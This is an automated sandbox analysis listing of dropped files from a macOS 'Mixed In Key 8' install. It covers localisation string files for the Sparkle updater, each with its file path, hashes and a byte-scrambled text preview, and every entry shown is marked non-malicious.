Preview:	..%" @fo% "@= " @%a f@%;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " @%% @ehuf revir..s te tni ngov re..rut li.tk. tiv..n ..ts u.rs.niug% .@V liute dnru.rs. a.nn.?a;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " @%% @ren ..ajts a..gt..af nes mref ..nael g..seass utdnni.a;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =."t.agaf% $2 @fa% $1 @ren ..f ..naeltge n...e trm .e .3%@$ .iVtl u.sk.ajh na a.nn.?a;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%h ferue kk iehmili dit l.a .ksiraf. ..mp.upf roirstni!sE tr u.a .ekry aofrrti.i .fad simkny?dE fkeiks aktl u.r.f...ar. i. giv..k reifssjt..arnn"..;". Aen wevsroi nfo% @ah sebnei snatllde"!= " .N ...gt..afa f@%h feruv re.i .estti nn"!.;". Aen wevsroi nfo% @sia avlibael"!= " .N ...gt..afa f@%e r.fa.lnge"!.;".nAe rr

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/it.lproj/.BC.T_3p9qmX Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3646
Entropy (8bit):	4.843902978796583
Encrypted:	false
SSDEEP:	96:P6BpbYAlAtiQLZ4sSj25wJq3lgL3AQiZ+:aYOQL4Ry+
MD5:	C61AEA0FF202980A419D3EAC48D869A3
SHA1:	46FBDD60C2BD71A907CC52B0800486485C68DE69
SHA-256:	D85F1741E25D66D2A3C156BFE983F2AAB4390BD4580E67F502C7DD672EBE59DD
SHA-512:	4CDEE53C104BF1541D663E62FD0E2D1745B45941CF5DE9536A56674649B0649C964FE0ECC2BF5D6B82EDFC5709107D9123207CF3E2F58279A172994B0C51C766
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @..s atots aciracote d..p ortn oep rseeseru itilzzta!oD sedire initslaalere r aivvaier 1%@$o ar"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =I"pmsoisibela ggoinrra e1%@$q audn oivne esegeiuotd anuv lomu eids lo aelttru aocemu .n..miamigend sioco u .n..nuti..o ttci.aS optsra e1%@$n lealC raetll apAlpcizaoiin ,irvaivraole r pioraver"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$. .alv reisno eip..r ceneeta ttaumlneetd siopinibel"..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @..d siopbnli;ed siopind lealv reisno e3%@$ .eDisedire esugri e.l..gaigroanemtn oro?a;"..%" @odnwoldade " =%" @csracita"o.;".@%o f@% " =%"$1 @id% $2"@.;". Aen wevsroi nfo% @sia avlibael"!=

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ja.lproj/.BC.T_UU4Vlc Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4122
Entropy (8bit):	5.670129832466164
Encrypted:	false
SSDEEP:	96:PWiZOn6/uGl8F5Q51wR8sPiz2LPJfLJOM2L4KLPS7XyNIfJ2oZae:uFnjGQQvwRyqLZLcZLhL2r2Yae
MD5:	4DD8CB383D73BC835678A965208A162A
SHA1:	AFEA320D4120BD2D3D140C8F4E34F50DF9772718
SHA-256:	A4819EC90F564A71EC906005921C8EDC090EDAAF19990E706FF49C4B24FCDCFC
SHA-512:	FACE8F4CD789A77A8AD9DFD1F731BA2AE1F2DE30912058E992D2A7F60575B6FB2C95C6E3777B7A10F3D42A803BDA4A718304D1D8E4811BC823EC93CB47F7293B
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @................................% $1 @..................................................?.;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$. ................................................................................................................%.$1 @............................................................................;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @....................................;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$. .................................... .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ko.lproj/.BC.T_lnaCal Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3490
Entropy (8bit):	5.7492033708150565
Encrypted:	false
SSDEEP:	96:PkvL6Oiv7PeAtRnLhu9LZ4LJOhLHLP45QESucBrC:YLhSbeAtRnLhMLZ4LchLHLh3dC
MD5:	2F74C221BEE30ECE6DE6B251A24091B9
SHA1:	A6D2E8B3B09BAE5D320E4B181A7CC1902FF7CF5B
SHA-256:	73D6AF660F2E59D43B1D0DE2AA0CA3E6F11E0044F3A1E29AB16FFBC3C1E312CA
SHA-512:	FA2CE6B9F798A4F48D5E4CEE0033F303592756A246F58EACA350757ABBF8A8A4D7E673357A671144DBF5D4740653421DB94BFCFB945B4F2F9652BD44A78847AE
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2.@...(.. )......... .......... ........... .............. ....... ............?.;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$..(...).. ....... ........ .DC. ........ ...... .... ...... ........ .......... ........ .......... ... ... ..........% $1.@...(.. )............. ....... ........ ...... ....... ..........;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2.@...(.. )..... .... .............;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$..(...).. ........ .............( ..... .... . :3%@$ )......... ............?.;"..%" @odnwoldade " =%" @......... ...."..;".@%o f@% " =%"$1

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/nl.lproj/.BC.T_0RcdsA Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3926
Entropy (8bit):	4.792603716238071
Encrypted:	false
SSDEEP:	96:PQ7ifqkrRCLhuMi83sbLXxLPjDO1PNShpGVUx+3HxZ3:M4q+RCLhtJoLXxL7DO1o03r3
MD5:	BC7B6D1A52851036451241DB1D63DF03
SHA1:	76BCE213F254401292F8432A6A2A59A646065359
SHA-256:	5BEF32AC7ED813273760E05384DD5C38B8D874BD0EF801BCDBC8359D280A2E75
SHA-512:	94F5E27807E65A977E621C62A32DE44FD55EB9F48ABDD413F9D61B1BC1009C17D013E1E7CB415D1D1CC77E54CEDE212024E5509C558CA66E369DB70B253BC51F
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @sig dewolnao dnei slkaa rovrog beurki !iWtlu % $1 @uni snatllrenee nehsrattrne"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @ak nintew roed negpuadeta slh tev nae nea llee-nelez novulem ,ozla see ncsihfjokip efoC ,Dg oeepdni .sV relpaast% $1 @anrad eaM p..P.orrgmaam..s...,.h retsra tav nadra ,nep orebreo npeiwu"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$i somemtnee ledr cenestetv reis.e;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$i sunb sehckiabra..u.h eetf% $3.@W li t ueh tund wolnaoed?n;"..%" @odnwoldade " =%" @egodnwolda;"..%" @fo% "@= " 1%@$v na% $2"@.;". Aen wevsroi nfo% @sia avlibael"!= " eE ninueewv reis eav n@%i sebcsihbkaa!r;"..A"n wev re

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/no.lproj/.BC.T_0W3Wth Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2514
Entropy (8bit):	4.757764323583795
Encrypted:	false
SSDEEP:	48:Lw9PGuXlOkON6BO0EmR46CEsRjS4sLkAIM4wjSFYG/HVtjqGX/fNPiwSWTA:LMPh2Q1EHjEsRm4sLFLjSFYiXVX/Zk
MD5:	12275E60C36D9C618F995ADE804347EC
SHA1:	9BE178C69AD2E0B2072A5E32C02ACF623A670224
SHA-256:	3B579F41B32DC344ED02C583EA67D7E712E162377B4AD6D46C663E764B82BBD5
SHA-512:	EF5E014E7B9B56DBC3E292A6D5A89C4AADDD6BEFCAA700DB61CE0F1D0F1C75E8237B9A0152A5AF3DA31346C5CE6FF03E85BF08F1EA122FA7F5F807FFFD91E7BD
Malicious:	false
Preview:	..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @ah rlbti tnitslaeltro grek al rit lrbkun seetg na g3%@$s attrreo pp !iV luds attr e.p .ynttn .."?.;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$e red nynseett lijgneegilegv rejsnone"..;".@%% @sin woa avlibael( oy uahev% )@ .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$e r.n .itglejgnlegi( udh ra% $3)@ ...snek rud. .alts eed nen d.n?.;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%h rai kk eitglnasgerttgiehet rit l..s rkvi eit lrpgoarmmte sifblna!eS attrred urf aned sifkli ?vHsii kk,es .pr.d nis syetammdnisirttaroo mjhle.p;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =E" nynv rejsnoa v@%h rab iltti snatllre!t;"..A"n wev reisnoo f@%i svaiaallb!e " =E" nynv rejsnoa v@%e ritglejgnlegi"!.;".nAe rr

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pl.lproj/.BC.T_h5VwEG Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3858
Entropy (8bit):	5.0187789669222775
Encrypted:	false
SSDEEP:	96:6pMex65YuDA2fXLhulLZLJOOLE21coN+k5+yQ6D:6uWenXLhoLZLcOLdcs
MD5:	A6FA5DFECFD42E36A84351B08A9FD16F
SHA1:	D949A210F9FE8764BF91550DAB60CA06CADD2314
SHA-256:	D670F74D95B059F7B44A94978D07DDC39528CDD5AD00EBBC529900C9C1A96AFD
SHA-512:	782EDABDE74D899827BAE351C156BC91AB7463984CD8096AF7A6052501D9A65D113794463E0FD7BD4228C01EF19959684E61C98640B8290BA86658F2A63D4A05
Malicious:	false
Preview:	../" 1%@$% $2 @ah sebned wolnaoed dna dsir aeydt osu!eW uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w " =%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"? ;/".1%@$% $2 @ah sebned wolnaoed dna dsir aeydt osu!eW uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w " =%"$1 @2%@$z soat..p boaryni j se togotywd o.uy.ic!aC yzc chai..yb..t rezaz iasnatolaw..i p nowoin erucuohim..% $1?@;"../" 1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni". ;/".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt yga

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pt_BR.lproj/.BC.T_VZjH49 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3250
Entropy (8bit):	4.912928929280295
Encrypted:	false
SSDEEP:	96:PhkNVoYRsHRgLhu3EMksv0Ss5LPG3+E+GZEGmc/dt:PYoRgLh8iLs+1yt
MD5:	A39C1047D2E1DE35BC79A6B6F5D35690
SHA1:	DE78D93D19530126B43DF7F8C6844F53623BD280
SHA-256:	8177B0F6884F81FEC257CB7A856FA0742B95931FAEBEE60C233975E8657C5295
SHA-512:	93A8D362322EB2D5EE9C4A539E3C4B11FAEFE09CBF686A9E7E94D03EB5324FFCD792DE17BF9F459FF0AB56A0AACDD939859FE888A86EFB792C28D6AAE53B4BE0
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @of iabxida o ese.t .rpnootp ra asu!oG soatir aedi snatal r eerniciai r o1%@$a ogar"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @.no.p do ees rtaauilazode qnautn oof rxecetuda o aaptrrid emuv lomu eosemtn eedl ieutar ,ocomu ami ameg medd sioco uDCD/DV .oMav% $1 @apara p saatA lpcitaviso ,ernicieio-e t neetn vomaneet"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$. . aevsr.. oamsir ceneetd siop.nv.le"..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @se.t .idpsno..ev-ls-auv re.so.. .3%@$ .oGtsraaid eabxi..l- ogaro?a;"..%" @odnwoldade " =%" @abxida"o.;".@%o f@% " =%"$1 @ed% $2"@.;". Aen wevsroi nfo% @sia avlibael"!= " mU aonavv re.so.d o@%e ts..d siop.nv.le

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pt_PT.lproj/.BC.T_0oP5gw Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3412
Entropy (8bit):	4.852061466756839
Encrypted:	false
SSDEEP:	96:P4t2UgGBfALZ1iVfX9EiX9svn1ZtLAy5LPGulG+aXuB:g2GBGENXjXCZtLRLJw+B
MD5:	ECC3E2D238E3A4081FE146066BD68D68
SHA1:	67545F691F19D42E54F892676DE289092109F443
SHA-256:	EC7CC3871D3E8131EE6CEA1951878E2DAD645ED4572AE2C6A6976AC143894E34
SHA-512:	9D15C9CFBF3F809F04B1107BE2ABD215A760223D339F311B4CA7A3432EDE974FE3C0009F879E7F443C7EC6472F1A4D11E01F8D67673966B3AD73B97FB94942CE
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " O1%@$% $2 @of irtnafsredi o ese.t .rpnoota i snatal!rG soatir aedo f zarea ogare r ieinicrao % $1 @optsreoimrneet"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =O"% $1 @.no.p do ees rcautlazida ouqnaode tsvirea s ree exucatoda p rait redu movulema epan sedl ieutarc mo omu amigamed eidcs ouod sioc. p.itoc .oMavo % $1 @apara s aup saatA lpci.a.e.,sr ieinic-e o.a . eettn eonavemtn.e;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " O1%@$% $2 @..n seetm moneota v re.so.m ia serectn eidpsno..ev.l;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =O"% $1 @2%@$e ts..a ogard siop.nv.lee t mea v re.so.% $3.@G soatir aedo t arsnefir rgaro?a;"..%" @odnwoldade " =%" @rtnafsredi"o.;".@%o f@% " =%"$1 @ed% $2"@.;

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ro.lproj/.BC.T_zzCKXy Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4012
Entropy (8bit):	4.937256495022775
Encrypted:	false
SSDEEP:	96:PO681gQJ0NAsLhuuLgkLJOXg7QLPL3SKNSlvaKFIo4lJb14ALkd8Zk:2uM07Lh7LgkLcwQLTCFUi4lJJdkd8k
MD5:	85F6A19EDEFE691A185ABE3D9334B475
SHA1:	A927473A4577D28E47A0509D4E59A734FFC644A4
SHA-256:	C731F50896200CED0E8126B22F890FD99566B06192015F6CFEB9EEDB708C0E76
SHA-512:	90A751B82764EDFA132E57C0B1C94C0B58C8DF7492CB29C952B69DA8E7C47E64D42506111113ACE25E077259C9D8D6721A2A9F26DD253EF0D6B8C1EC161E52E7
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @ aoftsd se.cr.ac t.. iseetg ta aedu itilazer !oDir.. i.s ... lnitsla.ai.. i.s ..l-r lenaas.. i1%@$a uc?m;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$n uopta eif icautlazita..a utcn i.cn. dseetp roin.t .edp enuv lomur ae-dnoylc a omigani eidcss uao u inateto tpci.. .uM.t .1%@$. n.d riceotur lpAlpcitaoisn ,eropnr.et.-e oeda ocol. i.. n.ecraacd nin uo"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$e ts e.. nrpzene tec aam ion.u .evsruiend siopinib.l..;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$e ts eidpsnobili...-.uta i3%@$ .oDir.. i.s . oedcs..cr.ai.a uc?m;"..%" @odnwoldade " =%" @edcs..crta;"..%" @fo% "@= " 1%@$d ni% $2"@.;". Aen wevsroi nfo% @sia avli

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ru.lproj/.BC.T_TFnuXi Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4456
Entropy (8bit):	5.207728062803533
Encrypted:	false
SSDEEP:	96:PcCb3Eq8m6R61i2z3lsX4LnLPn+OztEeN3+vuK6eB7qZW:ECom6R6Ex4LnLP+UP256W
MD5:	769C9A0037E04CD9A40E3EDBA1A766D7
SHA1:	B568AD5200E98B02CB7A25DD7510608510360933
SHA-256:	B901B30035274FB2A8D3F1347687B23808D8F90A238F5ED9BF7531402A1E1EB8
SHA-512:	A4DA065F6EAA90B696C9273B9A20B4728E6B5CEBAFD5B0E1D9ACA4EA798E3DE0B1C9ADC0F5427A9D4F26A680ABB3FB9BA1378D88F6F872FCFDD218AAF5C43DC6
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @.......... ........ ............... !........ ......... .... ............ .1%@$"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =.". ........ ..... .1%@$. ...... ,.................. ..... ...... .....,.. .. .......... ,........ .... ...... ......... ..... ......... ........ ,..... ......... .......... .............% $1 @... .... ............ ,............... .. ......... ............ ........;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " ... ........ ........% $1 @2%@$. ....... .........

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sk.lproj/.BC.T_MijB4F Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3380
Entropy (8bit):	5.089001636965965
Encrypted:	false
SSDEEP:	96:Pvr1ADu7OSRo63eLhug43eLJOOC3eL72kTAj0kKCLgJD:HReu7XRo63eLhg3eLcX3eLfTJD
MD5:	8183D0201D72055F55B7EFC27E301EE1
SHA1:	FA04D8B5DC4814EA88319E1DCAAD1EB9B4632583
SHA-256:	B9F6711D4C2F7F84B575AA952BCC86F25CCA8B7C6A1D097652F357D361E630FB
SHA-512:	D35DA5352994D66E50AA1814B9F2473A23BB624ECE75D5D4F39C26B4909C2A8221768CEAB79D0221DE279017B9410ED8B98A11FF00389519D53A84995219F320
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " pAil.kc.ai% $1 @2%@$b lo arpveaz.t . aejp irrpvane..n aop.ui.it!eC chte eetar zanni..atolav..a n ..lsdeenz onuvs upts.i .1%@$"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =A"lpki..ic u1%@$n me.on. okautlazivo.a,.a kejs uptsne..z ovz..kz u srp..aviml nen a...atin en(pa.rk.al d zboaruzd siuka elobo tpci.kh. oidks)u .rPse.ut. epail.kc.ui% $1 @odp ir.ei.kn apAlpcitaoisn ,pssuitetj udoit.a . aopot mnzvo aks..ts ekautlazi..ic.u;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2\@jn eannjvo..aid soutnp..v reiz.a;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =J" eodtspu.n .pail.kc.ai% $1 @2%@$. ..m ..et% $3.@C chte eujp erzvai..t reza"?.;".@%d wolnaoed"d= " @%p erzvta..;"..%" @fo% "@= " 1%@$z

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sl.lproj/.BC.T_077WqY Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	6830
Entropy (8bit):	3.46495966795087
Encrypted:	false
SSDEEP:	192:MAyLCm30rvUf3dzkPe588sbwJBqLnVdZP1YVpvJ:JyL4UmGRknZdk7
MD5:	6638FE0CDC41D8E56D382A756D8F6CFB
SHA1:	760501E45FD62794DDF4E03A4136BC73414D9F52
SHA-256:	18DD67772BCB35F45A15E8DAA30AC67771EF5C067909F22EC92271369C9F6BD8
SHA-512:	CF1F3E8D62EAF83A5AE0169493BE342B27749E9436B1EF62D5917C95156190CD76C8FC1CC5921208455C44982A28EFDA7A5BBE1554D3F7319C685DD84BF61BF8
Malicious:	false
